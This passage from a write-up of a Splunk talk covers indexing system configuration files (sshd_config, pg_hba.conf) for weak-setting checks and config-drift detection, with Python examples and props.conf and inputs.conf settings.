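    print("substring match on commented file:", naive_search(SSHD_COMMENTED, "PermitEmptyPasswords yes"))
    print("parsed PermitEmptyPasswords (commented file):", sshd_permits_empty_passwords(SSHD_COMMENTED))
    print("parsed PermitEmptyPasswords (weak file):", sshd_permits_empty_passwords(SSHD_WEAK))
    for rule in pg_hba_cleartext_rules(PG_HBA):
        print("clear-text pg_hba rule:", rule)
```

The substring check flags the commented file, the parser does not, and only the two password rules in pg_hba.conf are reported, with the hostssl one marked as at least TLS-protected in transit.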
14. Use Case – Config Drift
• By hashing each file event with the md5 eval function and counting distinct hashes per source, we can see the drift between hosts
• Consider sorting by your data gardens for compliance reports
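Slide 10 compares two copies of a file with the diff command and slide 14 spots drift with the md5 eval function. As an added example, not code from the talk, here is the same drift check done outside Splunk in Python over constructed events, one indexed copy of /etc/ssh/sshd_config per host: the latest copy per host is kept (the dedup step), each copy is hashed, the most common hash is taken as the baseline, and every deviating host gets a unified diff against it.

```python
import difflib
import hashlib
from collections import Counter, defaultdict

# Constructed events shaped like the config_file sourcetype: one whole-file event per
# host, _time being when that copy was indexed. Not data from the talk.
BASELINE = ("Port 22\n"
            "PermitRootLogin no\n"
            "PasswordAuthentication no\n"
            "PermitEmptyPasswords no\n")
SOURCE = "/etc/ssh/sshd_config"
EVENTS = [
    {"_time": 100, "host": "web01", "source": SOURCE, "_raw": BASELINE},
    {"_time": 100, "host": "web02", "source": SOURCE, "_raw": BASELINE},
    {"_time": 100, "host": "web03", "source": SOURCE, "_raw": BASELINE},
    # web03 was re-indexed after someone turned root login on
    {"_time": 200, "host": "web03", "source": SOURCE,
     "_raw": BASELINE.replace("PermitRootLogin no", "PermitRootLogin yes")},
    {"_time": 100, "host": "db01", "source": SOURCE, "_raw": BASELINE},
]


def md5_hex(text):
    """Same value as `| eval h=md5(_raw)`; a fingerprint for equality only, not
    relied on for any security property."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def latest_per_host(events):
    """Equivalent of `| dedup host, source` on time-sorted results."""
    latest = {}
    for e in events:
        key = (e["host"], e["source"])
        if key not in latest or e["_time"] > latest[key]["_time"]:
            latest[key] = e
    return list(latest.values())


def drift_report(events):
    """Per source: the baseline hash (the most common copy), how many distinct versions
    exist, and a unified diff for each host whose copy deviates from the baseline."""
    by_source = defaultdict(list)
    for e in latest_per_host(events):
        by_source[e["source"]].append(e)

    report = {}
    for source, copies in by_source.items():
        hashes = {e["host"]: md5_hex(e["_raw"]) for e in copies}
        baseline_hash, _ = Counter(hashes.values()).most_common(1)[0]
        baseline_raw = next(e["_raw"] for e in copies if hashes[e["host"]] == baseline_hash)
        drifted = {}
        for e in copies:
            if hashes[e["host"]] == baseline_hash:
                continue
            # same idea as `| diff pos1=1 pos2=2`, but against the fleet baseline
            diff = difflib.unified_diff(baseline_raw.splitlines(), e["_raw"].splitlines(),
                                        fromfile="baseline", tofile=e["host"], lineterm="")
            drifted[e["host"]] = "\n".join(diff)
        report[source] = {"baseline_md5": baseline_hash,
                          "distinct_versions": len(set(hashes.values())),
                          "drifted": drifted}
    return report


if __name__ == "__main__":
    for source, r in drift_report(EVENTS).items():
        print(f"{source}: {r['distinct_versions']} distinct version(s), baseline {r['baseline_md5']}")
        for host, diff in r["drifted"].items():
            print(f"--- drift on {host} ---\n{diff}")
```

Taking the majority hash as the baseline is a convenience for a first look; for a compliance report you would pin the baseline to the copy that came out of your config management system rather than to whatever most hosts happen to have.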
15. Splunk Admin
• Splunk_TA_nix does all of this: props, inputs, indexes
• I put all this in an app called TA-configsdemo on Splunkbase so you can play with these settings without dealing with Splunk_TA_nix

16. Splunk – props.conf
• Rather than creating one event per line, Splunk creates one event per file
• You can and should review your settings with btool (add --debug to see which .conf file each setting comes from)
• I noticed 4 settings in props.conf that are worthy of conversation
• Run btool on your indexer and on your search head

  $ ./splunk cmd btool props list config_file
  AUTO_KV_JSON = true
  CHECK_METHOD = modtime
  DATETIME_CONFIG = NONE
  KV_MODE = none

17. Props – AUTO_KV_JSON
  AUTO_KV_JSON = <boolean>
  * Used for search-time field extractions only.
  * Specifies whether to try json extraction automatically.
  * Default: true
• Meaning: if your file is well-structured JSON you will get field extraction by default
• I used another sourcetype for this

18. Props – CHECK_METHOD = modtime
  File checksum configuration
  * Set CHECK_METHOD to "endpoint_md5" to have Splunk software perform a checksum of the first and last 256 bytes of a file. When it finds matches, Splunk software lists the file as already indexed and indexes only new data, or ignores it if there is no new data.
  * Set CHECK_METHOD to "modtime" to check only the modification time of the file.
• Super helpful on config files that are really small and don't have enough characters to be checked with the first and last 256 bytes; it avoids the "too small" problem with Splunk sourcetypes
• With modtime, every change of the modification time re-indexes the whole file as a new event, which is what you want for config history. A touch without a content change re-indexes too, which is why comparing md5 hashes, not event counts, is the right drift signal

19. Props – DATETIME_CONFIG = NONE
  "NONE" leaves the event time set to whatever time was selected by the input layer
  * For data sent by Splunk forwarders over the Splunk-to-Splunk protocol, the input layer is the time that was selected on the forwarder by its input behavior (as below).
  * For file-based inputs (monitor, batch) the time chosen is the modification timestamp on the file being read.
  * For other inputs, the time chosen is the current system time when the event is read from the pipe/socket/etc.
  * Both "CURRENT" and "NONE" explicitly disable the per-text timestamp identification, so the default event boun
• In this case a config file is timestamped by your operating system; on a CentOS box the file might be dated 6-7 years ago. You need to consider this in your indexer retention strategy, since an event dated years in the past can age out of retention the moment it is indexed, and it will never show up in a search window like earliest=-48h

20. Props – KV_MODE = none
  * none: if you want no field/value extraction to take place.
• You will NOT get field extractions by default from your config files
• While a lot of your config files are key/value, they are large, and turning automatic extraction on is expensive; extract the few fields you need inline with rex instead

21. inputs.conf
  [monitor:///etc/ssh/sshd_conf*]
  index=configs
  sourcetype=config_file
• If you have Splunk_TA_nix installed, or have configured your props.conf as described above, this source will work
22. inputs.conf, cont.
• Trick: cat a file in through a scripted input
• The event time will be NOW (the script output carries no timestamp, so the current time is used)
• Saved our auditor days
• MD5 identical: the scripted copy hashes the same as the monitored copy, so drift comparisons still work across both inputs
• Make sure the file is there before you cat it!

  …
  # strConfigLocation is not shown on the slide; the path below is assumed from the source= setting of the input
  strConfigLocation=/etc/ssh/sshd_config
  do-execcat() {
    # display config
    if [ -f "$strConfigLocation" ]; then
      cat "$strConfigLocation"
    fi
  }
  …

  [script://./bin/cat_sshd_config.sh]
  index=osnixvcustom
  sourcetype=config_file
  source=/etc/ssh/sshd_config
  interval=86400
23. Indexer Stuff
• Very low sourcetype uniformity: every config file looks different
• Don't mix it with other sourcetypes in the same index for this reason
• Ideally not a default index you would search either, because a config event is a large set of characters and strings rather than a traditional log line

24. Gotcha's
• Config files are cheap in license volume, so there is little reason not to index them
• Watch out for shared file systems: the same file gets indexed once per host that mounts it
• Ensure your index permissions are well managed: configs reveal exactly how a host is built
• Don't index any secrets you don't want collected (database passwords and API keys live in config files too)

25. Thank You :)